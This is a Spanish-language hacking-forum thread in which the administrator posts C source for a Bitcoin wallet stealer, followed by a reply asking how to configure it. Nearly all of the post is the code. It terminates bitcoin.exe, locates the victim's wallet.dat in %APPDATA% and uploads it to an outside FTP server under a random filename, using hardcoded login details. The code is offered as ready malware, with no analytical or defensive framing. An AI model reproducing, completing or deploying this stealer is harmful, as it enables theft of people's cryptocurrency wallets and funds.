Bitcoin Wallet.dat FTP Stealer Source

  • 1 Respuestas
  • 8194 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5705
  • Actividad:
    26.67%
  • Country: ar
  • Reputación 37
  • ANTRAX
  • Skype: underc0de.org
  • Twitter: @Underc0de
    • Ver Perfil
    • Underc0de
    • Email

Bitcoin Wallet.dat FTP Stealer Source

  • en: Abril 12, 2012, 02:45:11 pm
Código: C
  1. // Coded by JuryBen
  2. // Gimme coins
  3. // 1LEXm6E4L9Ug9VNpkvXwJiZb61tspRiK7v
  4.  
  5. #include <windows.h>
  6. #include <tlhelp32.h>
  7. #include <tchar.h>
  8. #include <wininet.h>
  9. #include <ctime>
  10. #include <iostream>
  11. #pragma comment(lib, "wininet")
  12.  
  13. void killprocess()
  14.    {    
  15.  
  16.       HANDLE hProcessSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0 );      // Get the process list snapshot.
  17.       PROCESSENTRY32 ProcessEntry = { 0 };               // Initialize the process entry structure.
  18.       ProcessEntry.dwSize = sizeof( ProcessEntry );         // Get the first process info
  19.       BOOL Return = FALSE;
  20.       Return = Process32First( hProcessSnapShot,&ProcessEntry );
  21.  
  22.       int value = _tcsicmp(ProcessEntry.szExeFile, _T("bitcoin.exe"));
  23.       if (value==0)
  24.          {
  25.             HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, ProcessEntry.th32ProcessID); //Open Process to terminate
  26.             TerminateProcess(hProcess,0);
  27.             CloseHandle(hProcess); //Close Handle }
  28.      
  29.          }
  30.  
  31.    while( Process32Next( hProcessSnapShot, &ProcessEntry ));
  32.    CloseHandle( hProcessSnapShot );
  33. }
  34.  
  35. int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
  36. {
  37.    
  38.    killprocess();
  39.    Sleep(40000);
  40.    srand((unsigned)time(NULL));         // we get time to use for random seed
  41.    int seedone=rand();                  // seed one
  42.     int seedtwo=rand()*3;               // seed two times 3
  43.    int seedboth = seedone + seedtwo;      // combine seeds to ensure random int
  44.                                  // now we need to convert int to char
  45.    char randomseed[99];               // make randomseed buffer at 99 to prevent overflow
  46.     itoa(seedboth,randomseed,10);         // use itoa, [int (seedboth), randomseed (random is now seedboth but in char), value (10 coverts to decimal)
  47.                                  // did this so the wallet.dat file wouldn't be overwritten in ftp because of same file name
  48.    
  49.    char* appdata = getenv("APPDATA");      //Gets %Appdata% path
  50.    char* truepath = strcat(appdata, "\\Bitcoin\\wallet.dat");  //Bitcoin file to steal
  51.  
  52.    //ftp connection
  53.    HINTERNET hInternet;
  54.    HINTERNET hFtpSession;
  55.    hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
  56.    hFtpSession = InternetConnect(hInternet, "ftp.host.com", INTERNET_DEFAULT_FTP_PORT, "[email protected]", "bigdickben", INTERNET_SERVICE_FTP, 0, 0);  //ftp host, user, pass
  57.  
  58.    FtpPutFile(hFtpSession, truepath , randomseed , FTP_TRANSFER_TYPE_BINARY, 0);
  59.    FtpPutFile(hFtpSession, truepath, randomseed, FTP_TRANSFER_TYPE_BINARY, 0);
  60.  
  61.    InternetCloseHandle(hFtpSession);
  62.    InternetCloseHandle(hInternet);
  63.    
  64.    return 0;
  65. }

Autor: itz me
« Última modificación: Febrero 08, 2014, 05:45:10 pm por Expermicid »


Desconectado drako123

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:Bitcoin Wallet.dat FTP Stealer Source

  • en: Agosto 11, 2018, 03:44:26 pm
Hola antrax es un keyloger o un miner, como se configura.

 

[Source C++] Visualizando en pantalla lo que envia el microcontrolador(PIC).

Iniciado por Turka

Respuestas: 2
Vistas: 3030
Último mensaje Diciembre 03, 2012, 09:06:34 am
por Sanko
Stealer MSN

Iniciado por ANTRAX

Respuestas: 2
Vistas: 3647
Último mensaje Junio 22, 2011, 02:28:47 pm
por startsgame